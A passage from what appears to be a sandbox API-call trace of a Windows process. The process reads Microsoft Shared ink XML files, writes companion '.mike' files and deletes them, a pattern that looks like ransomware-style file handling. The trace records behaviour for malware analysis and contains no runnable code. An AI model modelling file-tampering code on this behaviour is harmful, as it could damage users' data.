lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.803] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0045.804] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0045.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.804] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), fInfoLevelId=0x0, lpFileInformation=0x2187ab0 | out: lpFileInformation=0x2187ab0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf7)) returned 1 [0045.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.804] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.804] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), fInfoLevelId=0x0, lpFileInformation=0x2187e14 | out: lpFileInformation=0x2187e14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf7)) returned 1 [0045.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.804] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.804] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", lpFilePart=0x0) returned 0x5c [0045.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.804] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", lpFilePart=0x0) returned 0x5c [0045.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0045.805] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0045.805] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", lpFilePart=0x0) returned 0x5c [0045.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.805] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.805] GetFileType (hFile=0x264) returned 0x1 [0045.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.805] GetFileType (hFile=0x264) returned 0x1 [0045.805] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0045.806] WriteFile (in: hFile=0x264, lpBuffer=0x2188e7c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x2188e7c*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0045.807] CloseHandle (hObject=0x264) returned 1 [0045.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.807] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), fInfoLevelId=0x0, lpFileInformation=0x2188908 | out: lpFileInformation=0x2188908*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf7)) returned 1 [0045.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.807] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.807] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.807] GetFileType (hFile=0x264) returned 0x1 [0045.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.807] GetFileType (hFile=0x264) returned 0x1 [0045.807] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0045.807] ReadFile (in: hFile=0x264, lpBuffer=0x2189fd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2189fd0*, lpNumberOfBytesRead=0x2af038*=0xf7, lpOverlapped=0x0) returned 1 [0045.808] CloseHandle (hObject=0x264) returned 1 [0045.809] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", lpFilePart=0x0) returned 0x5c [0045.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.809] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.809] GetFileType (hFile=0x264) returned 0x1 [0045.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.809] GetFileType (hFile=0x264) returned 0x1 [0045.809] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0045.809] WriteFile (in: hFile=0x264, lpBuffer=0x218d2b4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x218d2b4*, lpNumberOfBytesWritten=0x2af02c*=0x100, lpOverlapped=0x0) returned 1 [0045.809] CloseHandle (hObject=0x264) returned 1 [0045.810] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", lpFilePart=0x0) returned 0x5c [0045.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0045.810] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.810] GetFileType (hFile=0x264) returned 0x1 [0045.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0045.810] GetFileType (hFile=0x264) returned 0x1 [0045.811] WriteFile (in: hFile=0x264, lpBuffer=0x219050c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x219050c*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0045.811] CloseHandle (hObject=0x264) returned 1 [0045.812] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.812] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", lpFilePart=0x0) returned 0x5c [0045.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.812] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5826500, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5826500, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5826500, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x320)) returned 1 [0045.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.812] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.812] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", lpFilePart=0x0) returned 0x5c [0045.812] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2191d70 | out: lpFileInformation=0x2191d70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5826500, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5826500, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5826500, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x320)) returned 1 [0045.813] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.813] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", dwFileAttributes=0x80) returned 0 [0045.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", lpFilePart=0x0) returned 0x5c [0045.814] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5826500, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5826500, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5826500, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x320)) returned 1 [0045.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpFilePart=0x0) returned 0x57 [0045.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike", lpFilePart=0x0) returned 0x5c [0045.814] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.mike")) returned 1 [0045.815] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.815] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.815] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.815] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.817] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.817] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.817] GetFileType (hFile=0x264) returned 0x1 [0045.817] GetFileType (hFile=0x264) returned 0x1 [0045.817] CloseHandle (hObject=0x264) returned 1 [0045.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.818] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.818] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0045.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.818] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), fInfoLevelId=0x0, lpFileInformation=0x2194060 | out: lpFileInformation=0x2194060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc59)) returned 1 [0045.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.818] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), fInfoLevelId=0x0, lpFileInformation=0x21943b8 | out: lpFileInformation=0x21943b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc59)) returned 1 [0045.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", lpFilePart=0x0) returned 0x59 [0045.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.818] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.819] GetFullPathNameW (in: lpFileName="C:\\Program 